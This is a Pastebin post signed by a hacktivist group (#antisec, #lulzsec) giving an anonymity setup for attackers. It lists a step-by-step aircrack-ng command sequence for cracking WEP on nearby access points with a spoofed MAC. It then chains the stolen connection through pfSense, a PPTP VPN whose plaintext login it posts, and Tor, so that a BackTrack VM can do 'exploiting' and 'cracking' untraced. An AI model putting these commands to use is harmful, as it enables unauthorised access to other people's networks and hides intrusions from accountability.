Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ////////////////////////////////////////////////////////////////////////////////
- _ _ __ .__
- __| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
- \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
- | || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
- /_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #anonops
- |_||_| \/ \/ \/ \/ \/ #AntiSec-Ops
- ////////////////////////////////////////////////////////////////////////////////
- Want to stay hidden online?
- Take a laptop with virtualbox/vmware/whatever virtual host and a usb wifi that supports packet injection
- Install 4 virtual slices
- #1 Install an OS (preferably Backtrack 5 or any linux distro to use aircrack-ng)
- Directly attach usb wifi to this VM (wlan0)
- Create Private virtual LAN (vmnet0 which will be eth0 on VM)
- Scan for wep AP's in your area
- Use these commands to crack WEP encryption
- airmon-ng stop (interface)
- ifconfig (interface) down
- macchanger --mac 00:11:22:33:44:55 (interface)
- airmon-ng start (interface)
- airodump-ng (interface)
- airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
- aircrack-ng -b (bssid) (file name-01.cap)
- Connect to SSID
- Bridge wlan0 to eth0 (vmnet0)
- #2 pfsense firewall VM with a network adapter on vmnet0 (em0) and vmet1 (em1)
- http://www.fleximus.org/mirror/pfsense/downloads/pfSense-memstick-2.0.1-RELEASE-amd64.img.gz
- Install pfsense.
- Assign WAN to em0 and it should automatically pick up a dhcp IP from your previous slice
- Assign LAN to em1 and turn dhcp server on
- Login to pfsense config page (http://192.168.1.1 admin/pfsense by default) and go to pptp vpn page
- Use any of the following VPN servers:
- Australia Server: ip-au.vpnoneclick.com
- Canada Server: ip-ca.vpnoneclick.com
- Germany Server: ip-de.vpnoneclick.com
- United Kingdom Server: ip-uk.vpnoneclick.com
- USA Server: ip-us.vpnoneclick.com
- Swiss Server: ip-ch.vpnoneclick.com
- Italy Server: ip-it.vpnoneclick.com
- Random Server: ip-rnd.vpnoneclick.com
- Login:
- Username: 3I4T1Y5R8P
- Password: 8Y6G4O4A
- #3 Install VM to "tor-ify" all data with one network adapter on vmnet1 (eth0)
- Follow steps for setting up Tor Gateway.
- https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
- Box will receive IP from pfsense dhcp pool
- #4 Install BackTrack 5 also on vmnet1 (eth0)
- Set default Gateway to use tor box
- All traffic will route through tor box which is also routed through pfsense pptp vpn connection
- All exploiting/penetration testing, cracking, etc is done on this slice
- Feel free to contact us!
- Torchat: zwx6apd5yillugmw
- E-mail: antisec@tormail.net
- Twitter: https://twitter.com/AntiSecOp
- Facebook: http://tinyurl.com/785ejjc
- Only emails from tormail accounts will be answered. All will be read
- Stay frosty
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement